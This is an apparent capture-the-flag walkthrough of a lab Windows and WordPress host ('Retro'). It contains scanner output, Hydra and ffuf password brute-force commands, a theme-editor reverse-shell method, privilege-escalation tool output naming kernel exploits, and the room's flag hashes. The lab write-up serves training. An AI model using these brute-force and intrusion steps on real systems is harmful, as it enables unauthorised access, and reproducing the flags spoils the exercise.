Recon
Nmap
nmap 10.10.143.237 -T3 -A -Pn -oN nmap.log
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-21 22:46 +07
Nmap scan report for 10.10.143.237
Host is up (0.34s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-10-21T15:46:39+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2024-10-20T15:40:30
|_Not valid after: 2025-04-21T15:40:30
| rdp-ntlm-info:
| Target_Name: RETROWEB
| NetBIOS_Domain_Name: RETROWEB
| NetBIOS_Computer_Name: RETROWEB
| DNS_Domain_Name: RetroWeb
| DNS_Computer_Name: RetroWeb
| Product_Version: 10.0.14393
|_ System_Time: 2024-10-21T15:46:33+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.72 seconds
Nuclei
[waf-detect:modsecurity] [http] [info] http://10.10.143.237
[rdp-detect:win2016] [tcp] [info] 10.10.143.237:3389
[options-method] [http] [info] http://10.10.143.237 ["OPTIONS, TRACE, GET, HEAD, POST"]
[microsoft-iis-version] [http] [info] http://10.10.143.237 ["Microsoft-IIS/10.0"]
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:x-frame-options] [http] [info] http://10.10.143.237
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://10.10.143.237
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:x-content-type-options] [http] [info] http://10.10.143.237
[http-missing-security-headers:referrer-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:clear-site-data] [http] [info] http://10.10.143.237
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:strict-transport-security] [http] [info] http://10.10.143.237
[http-missing-security-headers:content-security-policy] [http] [info] http://10.10.143.237
[http-missing-security-headers:permissions-policy] [http] [info] http://10.10.143.237
[tech-detect:ms-iis] [http] [info] http://10.10.143.237
[default-windows-server-page] [http] [info] http://10.10.143.237
Feroxbuster
Found a hidden directory with feroxbuster:
feroxbuster -u http://10.10.143.237 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -C 404 --burp
Scans:
0: running http://10.10.143.237/
2: running http://10.10.143.237/retro/
Run nuclei again against this directory:
[waf-detect:modsecurity] [http] [info] http://10.10.143.237/retro
[wordpress-akismet:outdated_version] [http] [info] http://10.10.143.237/retro/wp-content/plugins/akismet/readme.txt ["4.1.2"] [last_version="5.3.3"]
[wordpress-xmlrpc-listmethods] [http] [info] http://10.10.143.237/retro/xmlrpc.php
[wp-xmlrpc-pingback-detection] [http] [info] http://10.10.143.237/retro/xmlrpc.php
[wp-xmlrpc-pingback-detection] [http] [info] http://10.10.143.237/retro/xmlrpc.php
[rdp-detect:win2016] [tcp] [info] 10.10.143.237:3389
[microsoft-iis-version] [http] [info] http://10.10.143.237/retro/ ["Microsoft-IIS/10.0"]
[microsoft-iis-version] [http] [info] http://10.10.143.237/retro ["Microsoft-IIS/10.0"]
[wordpress-xmlrpc-file] [http] [info] http://10.10.143.237/retro/xmlrpc.php
[wp-license-file] [http] [info] http://10.10.143.237/retro/license.txt
[wordpress-readme-file] [http] [info] http://10.10.143.237/retro/readme.html
[metatag-cms] [http] [info] http://10.10.143.237/retro/ ["WordPress 5.2.1"]
[tech-detect:font-awesome] [http] [info] http://10.10.143.237/retro/
[tech-detect:google-font-api] [http] [info] http://10.10.143.237/retro/
[tech-detect:ms-iis] [http] [info] http://10.10.143.237/retro/
[tech-detect:php] [http] [info] http://10.10.143.237/retro/
[tech-detect:ms-iis] [http] [info] http://10.10.143.237/retro
[http-missing-security-headers:clear-site-data] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:referrer-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:permissions-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:x-frame-options] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:x-content-type-options] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:strict-transport-security] [http] [info] http://10.10.143.237/retro/
[http-missing-security-headers:content-security-policy] [http] [info] http://10.10.143.237/retro/
[wordpress-login] [http] [info] http://10.10.143.237/retro/wp-login.php
[options-method] [http] [info] http://10.10.143.237/retro ["OPTIONS, TRACE, GET, HEAD, POST"]
[wordpress-detect:version_by_js] [http] [info] http://10.10.143.237/retro/ ["5.2.1"]
[wp-user-enum:usernames] [http] [low] http://10.10.143.237/retro/?rest_route=/wp/v2/users/ ["wade","Wade"]
[external-service-interaction] [http] [info] http://csb7pqm98q262osnfrs0u5qcpu1pmnqqx.oast.online/retro/
[external-service-interaction] [http] [info] http://csb7pqm98q262osnfrs0u5qcpu1pmnqqx.oast.online/retro/
[external-service-interaction] [http] [info] http://10.10.143.237/retro
Found a user named wade; this is probably the account username.
WPScan
[+] URL: http://10.10.170.153/retro/ [10.10.170.153]
[+] Started: Tue Oct 22 20:33:01 2024
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0
| - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.170.153/retro/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.170.153/retro/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.170.153/retro/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.170.153/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
| - http://10.10.170.153/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
[+] WordPress theme in use: 90s-retro
| Location: http://10.10.170.153/retro/wp-content/themes/90s-retro/
| Latest Version: 1.4.10 (up to date)
| Last Updated: 2019-04-15T00:00:00.000Z
| Readme: http://10.10.170.153/retro/wp-content/themes/90s-retro/readme.txt
| Style URL: http://10.10.170.153/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
| Style Name: 90s Retro
| Style URI: https://organicthemes.com/retro-theme/
| Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
| Author: Organic Themes
| Author URI: https://organicthemes.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4.10 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.170.153/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'
[i] No plugins Found.
[i] User(s) Identified:
[+] wade
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.170.153/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Wade
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Oct 22 20:33:37 2024
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 13.655 KB
[+] Data Received: 238.983 KB
[+] Memory used: 267.023 MB
[+] Elapsed time: 00:00:36
Analysis
Tried Hydra and ffuf to brute-force the password, but without any result:
hydra -l wade -P /usr/share/wordlists/rockyou.txt 10.10.170.153 http-post-form "/retro/wp-login.php:log=wade&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fretro%2Fwp-admin%2F&testcookie=1:F=incorrect" -V
ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "log=wade&pwd=FUZZ&wp-submit=Log+In&redirect_to=%2Fretro%2Fwp-admin%2F&testcookie=1" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: wordpress_test_cookie=WP+Cookie+check" -u http://10.10.170.153/retro/wp-login.php -mr "incorrect" -t 10
Some odd behaviour: for requests that trigger a server-side redirect, the site appends a / to the end of the URL and places the result in the Location header. Note that the host in the echoed URL (google.com) comes from the absolute-form request line, not from the Host header:
GET http://google.com/retro HTTP/1.1
Host: 10.10.170.153
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.170.153/retro/wp-login.php
Accept-Encoding: gzip, deflate, br
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: keep-alive
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://google.com/retro/
Server: Microsoft-IIS/10.0
Date: Tue, 22 Oct 2024 13:00:53 GMT
Content-Length: 147
The comment feature redirects to localhost:
POST /retro/wp-comments-post.php HTTP/1.1
Host: 10.10.170.153
Content-Length: 165
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.10.170.153
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.170.153/retro/index.php/2019/12/09/ready-player-one/
Accept-Encoding: gzip, deflate, br
Cookie: comment_author_36d06d37d33de1d9dfeeaba170ca88f4=a; comment_author_email_36d06d37d33de1d9dfeeaba170ca88f4=a%40a.com; comment_author_url_36d06d37d33de1d9dfeeaba170ca88f4=http%3A%2F%2Faaaaaa.cpm; wordpress_test_cookie=WP+Cookie+check
Connection: keep-alive
comment=comment&author=a&email=a%40a.com&url=http%3A%2F%2Faaaaaa.cpm&wp-comment-cookies-consent=yes&submit=Post+Comment&comment_post_ID=10&comment_parent=8
HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Location: http://localhost/retro/index.php/2019/12/09/ready-player-one/?unapproved=11&moderation-hash=96c337e7a14475cf6c9ff1d6e6126ba5#comment-11
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.1.29
Set-Cookie: comment_author_36d06d37d33de1d9dfeeaba170ca88f4=a; expires=Sat, 04-Oct-2025 19:22:39 GMT; Max-Age=30000000; path=/retro/
Set-Cookie: comment_author_email_36d06d37d33de1d9dfeeaba170ca88f4=a%40a.com; expires=Sat, 04-Oct-2025 19:22:39 GMT; Max-Age=30000000; path=/retro/
Set-Cookie: comment_author_url_36d06d37d33de1d9dfeeaba170ca88f4=http%3A%2F%2Faaaaaa.cpm; expires=Sat, 04-Oct-2025 19:22:39 GMT; Max-Age=30000000; path=/retro/
X-Redirect-By: WordPress
Date: Tue, 22 Oct 2024 14:02:39 GMT
Content-Length: 0
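Both captures above share one trait: the redirect target's host is not the host the client sent in its Host header. The following check is an added example, not part of the original write-up; it parses raw request/response pairs and flags such off-host redirects. The two samples are trimmed copies of the exchanges captured above.

```python
"""Flag HTTP redirects whose Location host is not the host the client asked for.

Added example, not from the original write-up. The two samples are trimmed
copies of the exchanges captured above.
"""
from urllib.parse import urlsplit

# Constructed from the first capture: absolute-form request line naming google.com.
REQ_ABSOLUTE = """\
GET http://google.com/retro HTTP/1.1
Host: 10.10.170.153
Connection: keep-alive
"""
RESP_ABSOLUTE = """\
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://google.com/retro/
Server: Microsoft-IIS/10.0
"""
# Constructed from the second capture: the comment form redirects to localhost.
REQ_COMMENT = """\
POST /retro/wp-comments-post.php HTTP/1.1
Host: 10.10.170.153
Content-Type: application/x-www-form-urlencoded

comment=comment&author=a&email=a%40a.com&comment_post_ID=10
"""
RESP_COMMENT = """\
HTTP/1.1 302 Found
Location: http://localhost/retro/index.php/2019/12/09/ready-player-one/?unapproved=11#comment-11
X-Redirect-By: WordPress
"""

def parse_message(raw):
    """Return (start line, {lowercased header: value}) from a raw HTTP message."""
    head = raw.split("\n\n", 1)[0]          # drop any body after the blank line
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def classify_redirect(raw_request, raw_response):
    """Compare the Location host against the Host header and the request-line host."""
    req_line, req_h = parse_message(raw_request)
    status_line, resp_h = parse_message(raw_response)
    status = int(status_line.split()[1])
    location = resp_h.get("location")
    if status not in (301, 302, 303, 307, 308) or not location:
        return {"redirect": False}
    target = req_line.split()[1]
    # An absolute-form request target carries its own host, separate from Host:.
    line_host = urlsplit(target).hostname if "://" in target else None
    loc_host = urlsplit(location).hostname
    host_header = req_h.get("host", "").split(":")[0]
    return {
        "redirect": True,
        "location_host": loc_host,
        "same_host": loc_host == host_header,          # expected for a sane redirect
        "echoes_request_line": line_host is not None and loc_host == line_host,
    }
```

A redirect that is neither same-host nor a deliberate external target points at the server deriving its canonical URL from the request or from a stale site setting (here, a WordPress site URL of localhost) rather than from a fixed configured host.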
Setting the nonsense above aside, there is a blog post titled “Ready Player One”. It has the following comment from the user Wade:
<p>Leaving myself a note here just in case I forget how to spell it: parzival</p>
The string parzival is the password.
Exploit
Log in to WordPress with the username wade and the password parzival, then follow the steps from the Internal room to create a reverse shell using the “Theme Editor” feature on the 404.php page.
The URL used to trigger the reverse shell differs slightly from Internal because the theme is named “twentynineteen” instead of “twentyseventeen”:
http://<IP>/retro/wp-content/themes/twentynineteen/404.php
Remember to activate the theme!
However, the wade user's directory cannot be accessed through the reverse shell.
Instead, use the same credentials to log in over RDP (nmap showed that port 3389, RDP, is open).
Log in and read the flag on the Desktop.
Escalate
Enumerate with WinPEAS.ps1:
Fetching the list of services, this may take a while...
Unquoted Service Path found!
Name: AWSLiteAgent
PathName: C:\Program Files\Amazon\XenTools\LiteAgent.exe
StartName: LocalSystem
StartMode: Auto
Running: Running
...
=========|| STARTUP APPLICATIONS Vulnerable Check
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#run-at-startup
RETROWEB\Wade has ownership of C:\Documents and Settings\Wade\Start Menu\Programs\Startup
Identity RETROWEB\Wade has 'FullControl' perms for C:\Documents and Settings\Wade\Start Menu\Programs\Startup
RETROWEB\Wade has ownership of C:\Documents and Settings\Wade\Start Menu\Programs\Startup\desktop.ini
Identity RETROWEB\Wade has 'FullControl' perms for C:\Documents and Settings\Wade\Start Menu\Programs\Startup\desktop.ini
RETROWEB\Wade has ownership of C:\Documents and Settings\Wade\Start Menu\Programs\Startup\RunWallpaperSetup.cmd
Identity RETROWEB\Wade has 'FullControl' perms for C:\Documents and Settings\Wade\Start Menu\Programs\Startup\RunWallpaperSetup.cmd
Identity BUILTIN\Users BUILTIN\Users has 'Write' perms for C:\ProgramData
Identity BUILTIN\Users BUILTIN\Users has 'Write' perms for C:\ProgramData
RETROWEB\Wade has ownership of C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Identity RETROWEB\Wade has 'FullControl' perms for C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
RETROWEB\Wade has ownership of C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
Identity RETROWEB\Wade has 'FullControl' perms for C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
RETROWEB\Wade has ownership of C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd
Identity RETROWEB\Wade has 'FullControl' perms for C:\Users\Wade\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd
...
=========|| APPcmd Check
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\System32\inetsrv\appcmd.exe exists!
Enumerate with PowerUp1.ps1:
[*] Checking for unquoted service paths...
ServiceName : AWSLiteAgent
Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'AWSLiteAgent' -Path <HijackPath>
[*] Checking %PATH% for potentially hijackable .dll locations...
HijackablePath : C:\Users\Wade\AppData\Local\Microsoft\WindowsApps\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\Wade\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll'
-Command '...'
Nothing usable for privilege escalation was found.
However, the following cmdlet lists the installed HotFixIDs, which identifies the most recent update applied to the target:
PS C:\Windows\system32> Get-HotFix
Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
RETROWEB Update KB3192137 NT AUTHORITY\SYSTEM 9/12/2016 12:00:00 AM
The room hints at looking for what the last user on the target was trying to hide. Opening the web browser reveals a bookmark related to CVE-2019-1388. However, attempting to exploit this CVE failed because the link could not be opened in the browser.
Looking at a few other write-ups, they escalate privileges either by exploiting a vulnerability in the Windows kernel or by abusing [the privileges of the user running the web server (Juicy Potato)](https://medium.com/azkrath/tryhackme-walkthrough-retro-273f8b35a20d) (this user holds `SeImpersonatePrivilege`; see also [[Windows Privilege Escalation - Abusing Dangerous Privileges]]).
The wesng (Windows Exploit Suggester - Next Generation) tool can suggest exploits applicable to the target. It takes the output of the systeminfo command as its input:
Host Name: RETROWEB
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00377-60000-00000-AA325
Original Install Date: 12/8/2019, 10:50:43 PM
System Boot Time: 10/23/2024, 7:52:59 AM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version: Xen 4.11.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,048 MB
Available Physical Memory: 937 MB
Virtual Memory: Max Size: 3,200 MB
Virtual Memory: Available: 2,017 MB
Virtual Memory: In Use: 1,183 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: KB3192137
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.10.0.1
IP address(es)
[01]: 10.10.53.114
[02]: fe80::136:8887:a9e1:f49c
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
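The systeminfo output above is exactly what wesng consumes, and the Get-HotFix table earlier gives the install date of the single hotfix. The following added example (not from the write-up, wesng or PowerUp) parses both formats and reports how long the host has run since its last update, the number a patch audit wants; the samples are trimmed copies of the two outputs captured above.

```python
"""Summarise a Windows host's patch state from `systeminfo` (the input wesng
consumes) and `Get-HotFix`. Added example, not from the write-up or wesng;
the samples are trimmed copies of the two outputs captured above."""
import re
from datetime import datetime

SYSTEMINFO_SAMPLE = """\
Host Name:                 RETROWEB
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
Original Install Date:     12/8/2019, 10:50:43 PM
System Boot Time:          10/23/2024, 7:52:59 AM
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB3192137
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
"""
GETHOTFIX_SAMPLE = """\
Source   Description  HotFixID   InstalledBy          InstalledOn
------   -----------  --------   -----------          -----------
RETROWEB Update       KB3192137  NT AUTHORITY\\SYSTEM  9/12/2016 12:00:00 AM
"""

def parse_systeminfo(text):
    """Return the 'Key: value' fields plus the hotfix list and OS build number."""
    info = {"hotfixes": []}
    section = None
    for line in text.splitlines():
        m = re.match(r"^(\S[^:]*):\s*(.*)$", line)
        if m:                                # a new top-level field
            section = m.group(1).strip()
            info[section] = m.group(2).strip()
        elif section == "Hotfix(s)":         # indented "[nn]: KBxxxxxx" lines
            kb = re.match(r"^\s*\[\d+\]:\s*(KB\d+)", line)
            if kb:
                info["hotfixes"].append(kb.group(1))
    build = re.search(r"Build (\d+)", info.get("OS Version", ""))
    info["build"] = build.group(1) if build else None
    return info

def parse_gethotfix(text):
    """Map each HotFixID in Get-HotFix table output to its InstalledOn date."""
    return {kb: datetime.strptime(d, "%m/%d/%Y")
            for kb, d in re.findall(r"(KB\d+)\s+.*?(\d{1,2}/\d{1,2}/\d{4})", text)}

def days_since_last_update(info, hotfix_dates):
    """Days between the newest installed hotfix and the last boot: the window
    in which the host has been running without a cumulative update."""
    boot = datetime.strptime(info["System Boot Time"], "%m/%d/%Y, %I:%M:%S %p")
    latest = max(hotfix_dates[kb] for kb in info["hotfixes"] if kb in hotfix_dates)
    return (boot - latest).days

if __name__ == "__main__":
    si = parse_systeminfo(SYSTEMINFO_SAMPLE)
    gap = days_since_last_update(si, parse_gethotfix(GETHOTFIX_SAMPLE))
    print(f"{si['Host Name']}: build {si['build']}, hotfixes {si['hotfixes']}, "
          f"{gap} days since last update")
```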
The following lists can also be used:
- SecWiki/windows-kernel-exploits: windows-kernel-exploits, a collection of Windows privilege escalation exploits
- WindowsExploits/Exploits: Windows Exploits: contains precompiled exploits, so they only need to be downloaded and run. CVE-2017-0213 and CVE-2016-7255 can be used to escalate privileges (exploited successfully).
So there are many ways to escalate privileges in this room, and the one the room hints at is not actually a workable one 😩.
Flag(s)
User: 3b99fbdc6d430bfb51c72c651a261927
Root: 7958b569565d7bd88d10c6f22d1c4063